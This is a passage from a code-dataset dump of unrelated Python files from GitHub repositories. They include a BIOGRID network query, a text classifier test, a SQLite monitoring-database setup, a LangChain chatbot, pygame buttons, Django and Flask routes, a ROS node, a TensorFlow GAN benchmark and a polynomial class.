full_df[\"source_lab\"] = full_df.merge(nodes, left_on=\"source\", right_on=\"Id\", how=\"left\")[\"Label\"].tolist()\n full_df[\"target_lab\"] = full_df.merge(nodes, left_on=\"target\", right_on=\"Id\", how=\"left\")[\"Label\"].tolist()\n nodes.to_csv(\"nodesTest.csv\", index=False)\n full_df.to_csv(\"full_df_test.csv\", index=False)\n return nodes, full_df\n\n\ndef BIOGRID_query(G, edges_df, nodes_df, q, depth, thresh=20):\n user_query = list(q.keys())[0]\n #edges_df[\"color\"] = 0\n\n query_list = list(q.values())\n \n # If the ID is not found in the BIOGRID nodes...\n if pd.Series(query_list).isin(nodes_df[\"Id\"]).sum() == 0:\n return None, None\n\n if depth == 1:\n qedges_df = makeQuery(edges_df, query_list, thresh=0)\n qedges_df[\"depth\"] = 1\n\n else:\n # Recursively find target nodes\n queried = [] #Already-queried nodes\n targets = copy.deepcopy(query_list)\n qedges_df_cols = list(edges_df.columns)\n qedges_df_cols.append(\"depth\")\n qedges_df = pd.DataFrame(columns = qedges_df_cols)\n for i in range(depth):\n query_df = makeQuery(edges_df, targets, thresh=thresh) #pre filter to avoid large networks\n queried.extend(targets)\n query_df[\"depth\"] = i+1\n qnodes_df = np.union1d(query_df[\"target\"].tolist(), query_df[\"source\"].tolist())\n targets = np.setdiff1d(qnodes_df, queried) #Get new nodes to use in the next query\n qedges_df = qedges_df.append(query_df)\n\n #Bidirectional edges\n opp_df = qedges_df.merge(edges_df, left_on=[\"source\", \"target\"], right_on=[\"target\",\"source\"])\n\n opp_df = opp_df.drop(\n labels=[\"source_x\",\"target_x\",\"thickness_x\"], axis=1\n ).rename(\n columns={\"source_y\":\"source\", \"target_y\":\"target\", \"thickness_y\":\"thickness\"}\n )\n\n qedges_df = pd.concat([qedges_df, opp_df]).drop_duplicates(subset=[\"source\", \"target\"])\n qedges_df[\"color\"] = 0\n\n # Make query nodes depth = 0, so they're in the center of the visualization\n df_dict = {\"target\":query_list, \"depth\":[0]*len(query_list)}\n zero_rows = pd.DataFrame.from_dict(df_dict)\n\n # Only need the targets, since every node (except for some query nodes) are a target at least once\n targets = qedges_df[[\"target\", \"depth\"]]\n qnodes_df = pd.concat([zero_rows, targets])\n\n sources = qedges_df[[\"source\", \"depth\"]]\n sources = sources.rename(columns={'source': 'target'})\n\n qnodes_df = pd.concat([qnodes_df, sources])\n qnodes_df = qnodes_df.sort_values('depth').drop_duplicates('target').sort_index().rename(columns={\"target\": \"Id\"})\n\n qnodes_df[\"KB\"] = \"BIOGRID\"\n\n qnodes_df = qnodes_df.merge(nodes_df, on=\"Id\", how=\"left\") # Get synonyms\n qnodes_df[\"Label\"] = qnodes_df[\"name\"]\n\n syn_concat = lambda x: \"%%\".join(x) # Separate each synonym with %%\n\n aggregation_functions = {\n 'Id': 'first',\n \"Label\": \"first\",\n 'name':\"first\",\n \"depth\":\"first\",\n \"KB\":\"first\",\n \"name\":syn_concat\n }\n\n qnodes_df = qnodes_df.groupby('Id').aggregate(aggregation_functions).reset_index(drop=True)\n\n qnodes_df[\"display_id\"] = qnodes_df[\"Id\"]\n qedges_df[\"color2\"] = qedges_df[\"color\"] * qedges_df[\"thickness\"]\n\n id_concat = lambda x: \"%%\".join(x) # Concat all source and target IDs of merged nodes\n aggregation_functions = {\n 'color2': 'sum',\n 'thickness': 'sum'\n }\n qedges_df = qedges_df.groupby([\"source\", \"target\"]).aggregate(aggregation_functions).reset_index()\n qedges_df[\"color\"] = qedges_df[\"color2\"]/qedges_df[\"thickness\"]\n\n def formatter(sources, targets):\n source_list = sources.split(\"%%\")\n target_list = targets.split(\"%%\")\n file_list = [f\"{source_list[i]}_{target_list[i]}.txt\" for i in range(len(source_list))]\n files = \"%%\".join(file_list)\n return files\n\n qedges_df[\"files\"] = qedges_df.apply(lambda x: formatter(x.source, x.target), axis=1)\n\n qnodes_df = qnodes_df[[\"Id\", \"Label\", \"depth\", \"KB\", \"display_id\", \"name\"]]\n qedges_df = qedges_df[[\"color\", \"thickness\", \"files\", \"source\", \"target\"]]\n \n qedges_df[\"source_DI\"] = qedges_df[\"source\"]\n qedges_df[\"target_DI\"] = qedges_df[\"target\"]\n qedges_df[\"source_lab\"] = qedges_df.merge(qnodes_df, left_on=\"source\", right_on=\"Id\", how=\"left\")[\"Label\"].tolist()\n qedges_df[\"target_lab\"] = qedges_df.merge(qnodes_df, left_on=\"target\", right_on=\"Id\", how=\"left\")[\"Label\"].tolist()\n return qnodes_df, qedges_df\n","repo_name":"micw42/verit-web","sub_path":"Query/SingleQuery.py","file_name":"SingleQuery.py","file_ext":"py","file_size_in_byte":11265,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"74617355246","text":"#Done for now\n\nfrom TextClassifier import *\n\n\ntest_path = './data/train/'\npath = './data/test/'\nmodel = TextClassifier()\n\ndata = model.organize_text(path+'pos/',path+'neg/')\ntests = model.organize_text(test_path+'pos/',test_path+'neg/')\nmodel.init_tokenizer(data['text'])\nX_train = np.array(model.proccess_text(data['text']))\nX_test = np.array(model.proccess_text(tests['text']))\ny_train = data['label']\ny_test = tests['label']\nprint(X_train.shape)\nmodel.train(X_train,y_train,X_test,y_test)\nscores = model.eval(X_test,y_test)\nprint(\"Accuracy: %.2f%%\" % (scores[1]*100))\n\nimport gc; gc.collect()\n","repo_name":"drewdawg8/MachineLearning","sub_path":"TextTester.py","file_name":"TextTester.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40998841822","text":"#!/usr/bin/env python3\n# coding : utf8\nimport sqlite3\nimport subprocess\nimport os\nimport signal \nimport sys\nimport time\n\nf1 = \"clean.sh\"\nproc = subprocess.Popen(['bash', f1])\n# on tue le processus au bout d'une seconde \ntime.sleep(1)\nproc.kill()\t\n\n# on sauvegarde le chemun absolu pour acceder a la base de donnees\ndirectory_bdd = os.getcwd()\ndirectory_bdd = directory_bdd + \"/Moteur_stockage.db\"\n\n# on sauvegarde le chemun absolu pour acceder a la base de donnees de restauration\ndirectory_bdd_backup = os.getcwd() + \"/backups\" + \"/Moteur_stockage_backups.db\"\n\nfile_address_ = os.getcwd()\nfile_address = ''\n\nfor i in file_address_:\n\tif i != file_address_[len(file_address_) - 1]:\n\t\tfile_address = file_address + i\n# on sauvegarde les chemuns dans un fichier de la partie 4, pour que le serveur y accede facilement\nfile_address = file_address + '4'\nfile_config = file_address + \"/bdd_directory\"\n\nfichier = open(file_config, 'w')\nfichier.write(directory_bdd + ':' + directory_bdd_backup + ':')\nfichier.close()\n\n\ntry:\n\tbdd = sqlite3.connect(directory_bdd)\n\tcurseur = bdd.cursor()\n\t# TAble qui permet de sauvegarder les administrateurs des serveurs distants\n\tcurseur.execute(\"\"\"\n\tCREATE TABLE IF NOT EXISTS admin(\n\t\tid_admin INTEGER PRIMARY KEY, \n\t mail VARCHAR(255),\n\t contrainte VARCHAR(8)\n\t)\n\t\"\"\")\n\t# TAble qui permet de sauvegarder les alerte du (http://www.cert.ssi.gouv.fr/)\n\tcurseur.execute(\"\"\"\n\tCREATE TABLE IF NOT EXISTS alerte(\n\t\tid_alerte INTEGER,\n\t ref_alerte VARCHAR(255) PRIMARY KEY,\n\t title_alerte VARCHAR(255),\n\t\tdate_alerte DATE,\n\t url_alerte TEXT\n\t)\n\t\"\"\")\n\t# Table qui sauvegarder les informations concernant les serveurs distants\n\tcurseur.execute(\"\"\"\n\tCREATE TABLE IF NOT EXISTS sonde(\n\t\tid_sonde INTEGER PRIMARY KEY, \n\t\tmac_address VARCHAR(255),\n\t\tdate_insert DATE,\n\t\tavg_cpu REAL,\n\t\ttmp_cpu REAL,\n\t\tram_total REAL,\n\t\tram_used REAL,\n\t\tswap_total REAL,\n\t\tswap_used REAL,\n\t\tnb_process REAL,\n\t\tuser_connect REAL,\n\t\tcheck_const VARCHAR(10),\n\t\tid_admin INTEGER,\n\t\tdisk_total REAL,\n\t\tdisk_usage REAL,\n\t\tphysical_core INTEGER,\n\t\tlogical_core INTEGER\n\t)\n\t\"\"\")\n\tbdd.commit()\n######################### CREATTION D'UNE BASE DE DONNEES POUR LA RESTAURATION #########################\n\tf1 = \"save.sh\"\n\tproc = subprocess.Popen(['bash', f1, directory_bdd, directory_bdd_backup])\n\t# on tue le processus au bout d'une seconde \n\ttime.sleep(1)\n\tproc.kill()\t\nexcept Exception as e:\n # Roll back si il y a des erreurs\n bdd.rollback()\n raise e\nfinally:\n # fermer la bdd\n bdd.close()","repo_name":"MessasKouseila/ControllPlatForm","sub_path":"partie2/moteur_stockage.py","file_name":"moteur_stockage.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"39984647358","text":"from chromadb.config import Settings\r\nfrom langchain import OpenAI\r\nfrom langchain.embeddings import OpenAIEmbeddings\r\nfrom langchain.vectorstores import Chroma\r\nfrom langchain.chains import ConversationalRetrievalChain\r\nfrom langchain.memory import ConversationBufferMemory\r\nimport os\r\nimport ingestgpt4all\r\n\r\n#Info: This version of LChain uses ChromaDB (ingestcomai.py) to create vectordb with OpenAI Embeddings.\r\nclass comai:\r\n\r\n def __init__(self):\r\n #Define args\r\n persist_directory= \"db\" \r\n os.environ[\"OPENAI_API_KEY\"] = (\"\")\r\n self.chat_history = []\r\n\r\n\r\n # Define the Chroma settings\r\n chroma_settings = Settings(\r\n chroma_db_impl='duckdb+parquet',\r\n persist_directory=persist_directory,\r\n anonymized_telemetry=False\r\n )\r\n\r\n #Setup the rest\r\n embeddings = OpenAIEmbeddings()\r\n self.db = Chroma(persist_directory=persist_directory, embedding_function=embeddings, client_settings=chroma_settings)\r\n self.memory = ConversationBufferMemory(memory_key=\"chat_history\", return_messages=True)\r\n self.pdf_qa = ConversationalRetrievalChain.from_llm(OpenAI(temperature=0.05, model_name=\"text-davinci-003\") , self.db.as_retriever(), memory=self.memory)\r\n \r\n\r\n def setupIngestion():\r\n ingestgpt4all.embeddings_model_name = \"text-embedding-ada-002\"\r\n\r\n def sendToGPT(self, query):\r\n result = self.pdf_qa({\"question\": query, \"chat_history\": self.chat_history})\r\n self.chat_history.append((query, result['answer']))\r\n print(result['answer']) \r\n return result\r\n\r\n#vvvvv uncomment for test vvvvv \r\n#instance = comai()\r\n#instance.sendToGPT(\"Wie kann ich meinen Anwesenheitsstatus in Teams ändern ?\")\r\n","repo_name":"MertUzeken/AIProject","sub_path":"comai/LChainTest.py","file_name":"LChainTest.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14101287125","text":"from os import listdir, path\nfrom typing import Callable, Dict\nimport pygame\nfrom pygame.surface import Surface\n\nimport config\n\n\n# ----------------------------------------------------------------\n# pulls all graphics into a dictionary, key is the png name.\n# value is the pygame image.\ndef generate_images() -> Dict[str, Surface]:\n btn_dict: Dict[str, Surface] = {}\n for file in listdir(config.IMG_DIR):\n f = path.join(config.IMG_DIR, file)\n if path.isfile(f):\n btn_dict[file[:-4]] = pygame.image.load(f).convert_alpha()\n\n # loop scales each image value and resizes.\n btn: str\n for btn in btn_dict.keys():\n if btn[:5] == \"chip_\":\n # scales the chip_btns\n btn_dict[btn] = pygame.transform.scale(\n btn_dict[btn],\n ((config.BUTTON_WIDTH / 5) * 3, (config.BUTTON_HEIGHT / 5) * 3),\n )\n else:\n # scles game buttons\n btn_dict[btn] = pygame.transform.scale(\n btn_dict[btn], (config.BUTTON_WIDTH, config.BUTTON_HEIGHT)\n )\n\n return btn_dict\n\n\nclass Button:\n \"\"\"\n Abstract class, draws the button, checks collide and sets active. Also\n uses a call back function from the first argument in the constructor back\n to the game.\n \"\"\"\n\n def __init__(\n self,\n on_click: Callable[..., None],\n button_up_img: Surface,\n button_down_img: Surface,\n x: int,\n y: int,\n active: bool,\n ):\n assert callable(on_click)\n self.on_click = on_click\n self.image = [button_up_img, button_down_img]\n self.index = 0\n self.rect = self.image[self.index].get_rect(x=x, y=y)\n self.active = active\n # self.image_change = False\n\n def set_active(self, bool: bool) -> None:\n self.active = bool\n\n def get_active(self) -> bool:\n return self.active\n\n def draw_button(self, area: Surface) -> None:\n area.blit(self.image[self.index], (self.rect))\n\n def set_index(self, num: int) -> None:\n self.index = num\n\n # x, y are the mouse x, y co_ords\n def check_collide(self, x: int, y: int) -> bool:\n if self.rect.collidepoint(x, y) and self.get_active():\n self.set_index(1)\n return True\n return False\n\n\nclass Game_button(Button):\n \"\"\"\n Controls the game buttons running along the bottom of the interface.\n Inherts form Button(). Game buttons have 3 images.\n \"\"\"\n\n def __init__(\n self,\n on_click: Callable[..., None],\n button_up_img: Surface,\n button_down_img: Surface,\n x: int,\n y: int,\n grey_image: Surface,\n active: bool = False,\n ):\n super().__init__(on_click, button_up_img, button_down_img, x, y, active=active)\n self.grey_img = grey_image\n self.image.append(self.grey_img)\n if not self.active:\n self.index = 2\n\n def reset_image(self) -> None:\n if self.get_active():\n self.set_index(0)\n else:\n self.set_index(2)\n\n def click(self) -> None:\n if self.get_active():\n self.on_click()\n\n\nclass Chip_button(Button):\n \"\"\"\n Inherts form Button, this class controls the betting chip buttons.\n Chip buttons have two images.\n \"\"\"\n\n def __init__(\n self,\n on_click: Callable[..., None],\n button_up_img: Surface,\n button_down_img: Surface,\n x: int,\n y: int,\n value: int,\n ) -> None:\n super().__init__(on_click, button_up_img, button_down_img, x, y, active=True)\n self.value = value\n\n def click(self) -> None:\n if self.get_active():\n self.on_click(self.value)\n\n def reset_image(self) -> None:\n self.set_index(0)\n","repo_name":"GunnerShents/BlackJack","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"1296292544","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.PostIndex.as_view(), name='home'),\n path('new/', views.PostCreate.as_view(), name='developer'),\n path('posts/', views.PostIndexTwo.as_view(), name='index'),\n path('posts//', views.PostDetail.as_view(), name='post_detail'),\n path('posts//delete/', views.PostDelete.as_view(), name='post_delete'),\n path('posts//update/', views.PostUpdate.as_view(), name='post_update'),\n path('about/', views.about, name='about'),\n path('accounts/register/', views.register, name='register')\n]","repo_name":"Avisa-GA/washington-post","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23926506575","text":"import traceback\n\nfrom flask import Blueprint, request, make_response, jsonify\nfrom modules.emprestimo.dao import EmprestimoDao\nfrom modules.emprestimo.modelo import Emprestimo\nfrom util.database import ConnectDB\n\napp_emprestimo = Blueprint('app_emprestimo', __name__)\napp_name = 'emprestimo'\ndao = EmprestimoDao(database=ConnectDB())\n\n@app_emprestimo.route('/{}/'.format(app_name), methods=['GET'])\ndef get_emprestimos():\n emprestimos = dao.get_all()\n return make_response(jsonify(emprestimos), 200)\n\n@app_emprestimo.route('/{}/add/'.format(app_name), methods=['POST'])\ndef add_emprestimo():\n try:\n data = request.form.to_dict(flat=True)\n emprestimo = Emprestimo(\n data_inicio=data.get('data_inicio'),\n prazo_devolucao=data.get('prazo_devolucao'),\n data_devolucao=data.get('data_devolucao'),\n status=data.get('status'),\n cliente_id=data.get('cliente_id'),\n funcionario_id=data.get('funcionario_id'),\n livro_id=data.get('livro_id'))\n emprestimo = dao.save(emprestimo)\n except Exception as e:\n print(e)\n print(traceback.format_exc())\n return make_response(\n {\n 'error': True,\n 'message': str(e)\n }, 400)\n return make_response({'id': emprestimo.id}, 201)\n\n@app_emprestimo.route('/{}//'.format(app_name),\n methods=['PUT'])\ndef edit_emprestimo(id):\n data = request.form.to_dict(flat=True)\n emprestimo = dao.get_by_id(id)\n if not emprestimo:\n return make_response({'error': '{} não existe'.format(app_name)}, 404)\n dao.edit(id, data)\n emprestimo = dao.get_by_id(id)\n return make_response(emprestimo, 200)\n\n\n@app_emprestimo.route('/{}//'.format(app_name),\n methods=['GET'])\ndef get_emprestimo_by_id(id):\n emprestimo = dao.get_by_id(id)\n if not emprestimo:\n return make_response({'error': '{} não existe'.format(app_name)}, 404)\n return make_response(emprestimo, 201)\n\n\n@app_emprestimo.route('/{}/delete//'.format(app_name),\n methods=['DELETE'])\ndef delete_emprestimo_by_id(id):\n try:\n emprestimo = dao.get_by_id(id)\n dao.delete_by_id(id)\n except Exception as e:\n print(e)\n print(traceback.format_exc())\n return make_response(\n {\n 'error': True,\n 'message': str(e)\n }, 400)\n return make_response(emprestimo, 201)\n","repo_name":"valdemir08/librazza-api","sub_path":"modules/emprestimo/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5110432697","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport rospy\nfrom composiv_tryouts.msg import hit\nimport random # hasar değeri üretmek için\n\ndef talker():\n\n pub = rospy.Publisher(\"hit_topic\", hit, queue_size=10)\n #bu şekilde \"hit_topic\" isminde bir topic oluşturduk ve pub ismindeki objeye atadık\n\n rospy.init_node(\"composiv_talker\", anonymous=True)\n #\"composiv_talker\" isminde bir düğüm tanımladık\n\n rate = rospy.Rate(1)\n #çalışma hızı 1 Hz\n\n max_health = 100 #vurulan kişinin ilk canı\n\n while(not rospy.is_shutdown()): \n #bu şekilde ros sistemi çökmediği sürece while içerisine girebilecek\n \n hit_obj = hit()\n hit_obj.shooter = \"Ahmet\"\n hit_obj.hitted = \"Alp\"\n hit_obj.last_damage = random.randint(0, 100)\n hit_obj.hitted_health = max_health - hit_obj.last_damage\n #burada verileri yerleştirdik\n\n rospy.loginfo(hit_obj) \n #verileri terminale yazdırmak için kullanacağız\n\n pub.publish(hit_obj)\n #yayınımızı tanımladık\n\n rate.sleep()\n #çalışma hızını yuakarıda belittiğimiz değerde tutmak için kullanılır\n\nif __name__ == '__main__':\n\n try:\n talker()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"AhmetArdic/EterationCase","sub_path":"workspace/src/composiv_tryouts/scripts/composiv_talker.py","file_name":"composiv_talker.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"74035793965","text":"import os\nimport pprint\nfrom datetime import datetime\nimport requests\nfrom url_utils import gen_from_urls\n\ndef convert2ampm(time24: str) -> str:\n return datetime.strptime(time24, '%H:%M').strftime('%I:%M%p')\n\n\nif os.path.isfile('bussers.csv'):\n with open('bussers.csv') as data:\n ignore = data.readline()\n flights = {}\n for line in data:\n # strip deletes spaces at the start and end of line (\\t, \\n, \\r)\n k, v = line.strip().split(',')\n flights[k.strip()] = v.strip()\n pprint.pprint(flights)\nelse:\n print('no file, sorry')\n\n\nflights2 = {}\nfor k, v in flights.items():\n flights2[convert2ampm(k)] = v.title()\n\n\npprint.pprint(flights2)\n\n\n# generators for lists\nmore_dests = [dest.title() for dest in flights.values()]\n\nprint('more_dest =', more_dests)\n\n# generators fore dictionary\nmore_flights = {convert2ampm(k): v.title() for k, v in flights.items()}\nprint('more_flights', more_flights)\n\n\njust_freeport = {convert2ampm(k): v.title()\n for k, v in flights.items()\n if v == 'FREEPORT'}\n\nprint('just_freeport', just_freeport)\n\n\ndests = set(flights.values())\nprint('dests = ', dests)\n\nfor dest in set(flights.values()):\n print(dest, '->', [k for k, v in flights.items() if v == dest])\n\n\nwhen = {dest: [k for k, v in flights.items() if v == dest] for dest in set(flights.values())}\n\nprint('when =', when)\n\n# set generator\nvowels = {'a', 'e', 'i', 'o'}\nmessage = 'Dont forget to pack your towel'\n\nfound = set()\nfor v in vowels:\n if v in message:\n found.add(v)\n\nprint('found = ', found)\nfound2 = { v for v in vowels if v in message}\n\nprint('found2 = ', found2)\n\n\n# ---\n\nurls = ('http://headfirstlabs.com', 'http://twitter.com', 'http://facebook.com')\n# generators of lists forece cycle for wait till list is generated [] -> generator of lists\n# when list is generated then cycle for is printing data in that list\n# for resp in [requests.get(url) for url in urls]:\n# print(len(resp.content), '->', resp.status_code, '->', resp.url)\n# expression generator generates values one by one and once he generated first value he passes it into for cycle\n# so it is very responsive and make sense when u have a lot of data and cant wait till 100 bilions of data will be\n# generated in list\n\n\n# for resp in (requests.get(url) for url in urls):\n# print(len(resp.content), '->', resp.status_code, '->', resp.url)\n\n\nfor resp_len, status, url, in gen_from_urls(urls):\n print(resp_len, status, url)","repo_name":"VadimSadriev/PythonLearning","sub_path":"Basics/Generators.py","file_name":"Generators.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70842863408","text":"import numpy as np\nimport argparse\n\nfrom tensorflow.keras.layers import Input, Flatten, Dense, Reshape, Dropout, Embedding, Multiply, Activation, Conv2D, ZeroPadding2D, LocallyConnected2D, Concatenate, GRU, Lambda\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.layers import LeakyReLU\nfrom tensorflow.keras.models import Model, Sequential\nfrom tensorflow.compat.v1.keras.layers import UpSampling2D\n\nimport tensorflow as tf\nimport time\nfrom tensorflow.keras import backend as K\n\nprint(tf.__version__)\n\nloops_to_do = int(3E5)\n\n\n# List of batch sizes to test\nbatch_size_i_array = np.logspace(0,4,10)\n\n\nmake_x_particles = False\nloops = 100\n\n\n''' Create the network. '''\nlatent_size = 200\n\nloc = Sequential([\n Dense(128 * 7 * 7, input_dim=latent_size),\n Reshape((7, 7, 128)),\n\n Conv2D(64, (5, 5), padding='same', kernel_initializer='he_uniform'),\n LeakyReLU(),\n BatchNormalization(),\n UpSampling2D(size=(2, 2),interpolation='bilinear'),\n\n ZeroPadding2D((2, 2)),\n LocallyConnected2D(6, (5, 5), kernel_initializer='he_uniform'),\n LeakyReLU(),\n BatchNormalization(),\n UpSampling2D(size=(2, 2),interpolation='bilinear'),\n\n LocallyConnected2D(6, (3, 3), kernel_initializer='he_uniform'),\n LeakyReLU(),\n LocallyConnected2D(1, (2, 2), use_bias=False, kernel_initializer='glorot_normal'),\n Activation('relu')\n])\n\nlatent = Input(shape=(latent_size, ))\n\nimage_class = Input(shape=(1, ), dtype='int32')\nemb = Flatten()(Embedding(2, latent_size, input_length=1,\n embeddings_initializer='glorot_normal')(image_class))\n\nh = Multiply()([latent, emb])\n\nfake_image = loc(h)\n\ngenerator = Model(inputs=[latent, image_class], outputs=[fake_image])\n\ngenerator.summary()\n\n\n\n\nfor batch_size_i in batch_size_i_array:\n\n\n\tbatch_size = int(batch_size_i)\n\tbatchsize = int(batch_size_i)\n\n\tprint(' ')\n\tprint(batch_size)\n\n\n\t@tf.function(experimental_relax_shapes=True)\n\tdef body(loop_index, output):\n\n\t\tnoise = tf.random.normal((batchsize, 200), 0, 1)\n\t\tclass_i = tf.ones((batchsize, 1))\n\n\t\tlogits = generator([noise, class_i], training=False)\n\n\t\tcombined_output = tf.squeeze(logits,axis=-1)\t\t\t\n\n\t\treturn [loop_index+1, tf.concat([output, combined_output], axis=0)]\n\n\tprint(loops_to_do/batchsize)\n\n\n\tprint('warming up1')\n\tloop_index = tf.constant(0)\n\n\toutput = tf.zeros([0, 25, 25], dtype=tf.float32)\n\t\n\tcondition_func = lambda loop_index, output: loop_index < 1\n\tt0 = time.time()\n\tgenerated_training = tf.while_loop(condition_func, body, loop_vars=[loop_index, output])[1]\n\tt1 = time.time()\n\ttotal_time = t1-t0\n\tprint('warm up1',np.shape(generated_training),'time',total_time)\n\n\n\n\tprint('warming up')\n\tloop_index = tf.constant(0)\n\n\toutput = tf.zeros([0, 25, 25], dtype=tf.float32)\n\t\n\tif make_x_particles == True:\n\t\tcondition_func = lambda loop_index, output: tf.shape(output)[0] < loops_to_do\n\telif make_x_particles == False:\n\t\tcondition_func = lambda loop_index, output: loop_index < loops\n\tt0 = time.time()\n\tgenerated_training = tf.while_loop(condition_func, body, loop_vars=[loop_index, output])[1]\n\tt1 = time.time()\n\ttotal_time = t1-t0\n\tprint('warm up',np.shape(generated_training),'time',total_time)\n\n\n\n\tprint('Starting test...')\n\tloop_index = tf.constant(0)\n\n\toutput = tf.zeros([0, 25, 25], dtype=tf.float32)\n\n\t\n\tif make_x_particles == True:\n\t\tcondition_func = lambda loop_index, output: tf.shape(output)[0] < loops_to_do\n\telif make_x_particles == False:\n\t\tcondition_func = lambda loop_index, output: loop_index < loops\n\tt0 = time.time()\n\tgenerated_training = tf.while_loop(condition_func, body, loop_vars=[loop_index, output])[1]\n\tt1 = time.time()\n\tprint(np.shape(generated_training))\n\n\ttotal_time = t1-t0\n\n\tpoints_in_5_mins = (np.shape(generated_training)[0]/total_time)\n\tprint('Time to generate %d points: %.3fs'%(np.shape(generated_training)[0],total_time))\n\n\tprint('Points generated in 5 mins: %d'%int(points_in_5_mins),'batch_size',batch_size)\n\n\n\twith open(\"results_lagans.txt\", \"a\") as myfile:\n\t\tmyfile.write('%d, %.2f \\n'%(batch_size, points_in_5_mins))\n\n\n\n","repo_name":"dpohanlon/IPU4HEP","sub_path":"event_generation/INFERENCE_CPU_GPU_lagans.py","file_name":"INFERENCE_CPU_GPU_lagans.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17274136568","text":"class Polynomial:\n def __init__(self, data):\n self.data = [[data[i], len(data)-i-1] for i in range(len(data))]\n self.refine()\n\n def __repr__(self):\n r = \"\"\n for coeff, deg in self.data:\n if coeff > 0:\n r += \"+\"\n coeff = str(coeff)\n deg = \"^\" + str(deg)\n if coeff == \"1\":\n coeff = \"\"\n elif coeff == \"-1\":\n coeff = \"-\"\n if deg == \"^1\":\n deg = \"\"\n elif deg == \"^0\":\n deg = \"\\b \"\n if coeff == \"\":\n coeff = \"1\"\n r += coeff + \"x\" + deg + \" \"\n if len(r):\n if r[0] == \"+\":\n return r[1:]\n else:\n return r\n else:\n return \"0\"\n\n def refine(self):\n data2 = []\n k = []\n for term in self.data:\n k.append(term[1])\n k = list(set(k))[::-1]\n for element in k:\n s = 0\n for term in self.data:\n if element == term[1]:\n s += term[0]\n data2.append([s, element])\n # print(data2)\n self.data = data2\n\n def multiply(self, pol):\n pol1 = self.data\n pol2 = pol.data\n product = []\n for term1 in pol1:\n for term2 in pol2:\n t = [term1[0]*term2[0], term1[1]+term2[1]]\n product.append(t)\n return Polynomial(product)\n\n\nclass MultiPolynomial:\n def __init__(self, data):\n self.data = data\n self.refine()\n\n def __repr__(self): # [[1, 2, 0], [1, 1, 1], [1, 0, 2]]\n r = \"\"\n for term in self.data:\n coeff = term[0]\n degrees = term[1:]\n \n # working with coeff\n if coeff>1:\n coeff = \"+\" + str(coeff) + \"*\"\n elif coeff == 1:\n if sum(degrees):\n coeff = \"+\"\n else:\n coeff = \"+1\"\n else:\n coeff = str(coeff)\n r += coeff\n \n if coeff != \"0\":\n # working with degrees\n for var, degree in enumerate(degrees):\n if degree != 0:\n if degree != 1:\n r += f\"x{var+1}^{degree}*\"\n else:\n r += f\"x{var+1}*\"\n if r[-1]==\"*\": r += \"\\b \"\n if len(r):\n if r[0] == \"+\":\n return r[1:]\n else:\n return r\n else:\n return \"0\"\n\n def refine(self):\n A = self.data\n powers = []\n for term in A:\n powers.append(str(term[1:]))\n powers = list(set(powers))\n ans = []\n for power in powers:\n s = 0\n for term in A:\n if power == str(term[1:]):\n s += term[0]\n ans.append([s]+eval(power))\n ans = sorted(ans, key=lambda x: sum(x[1:]), reverse=True)\n self.data = ans\n\n def multiply(self, pol):\n A = self.data\n B = pol.data\n ans = []\n for term1 in B:\n for term2 in A:\n t = []\n t.append(term1[0]*term2[0])\n for i in range(1, len(A[0])):\n # print(f\"\\t\\tterm1 = {term1}\")\n # print(f\"\\t\\tterm2 = {term2}\")\n X = term1[i]+term2[i]\n # print(f\"\\t{X}\")\n t.append(X)\n ans.append(t)\n # print(ans)\n return MultiPolynomial(ans)\n\n\n\nif __name__ == \"__main__\":\n # pol1 = MultiPolynomial([[1, 1, 0, 0],\n # [1, 0, 1, 0]])\n\n # pol2 = MultiPolynomial([[1, 1, 0, 0],\n # [1, 0, 0, 1]])\n\n # pol3 = MultiPolynomial([[1, 0, 1, 0],\n # [1, 0, 0, 1]])\n\n # print(\"pol1 =\", pol1)\n # print(\"pol2 =\", pol2)\n # print(\"pol3 =\", pol3)\n\n # result = pol1.multiply(pol2).multiply(pol3)\n\n # print(\"product =\", result)\n \n print(Polynomial([1, 2, 5, 0, 6]))","repo_name":"PeithonKing/comp_phys_P346","sub_path":"library/polynomial_multiplication.py","file_name":"polynomial_multiplication.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26866106380","text":"import team_paths\r\n\r\nfout = file('illinois.html', 'w')\r\nfout.write('Illinois Numbers\\n')\r\nfout.write('
\\n')\r\nfout.write('Find the Illinois number of:
\\n')\r\nfout.write('
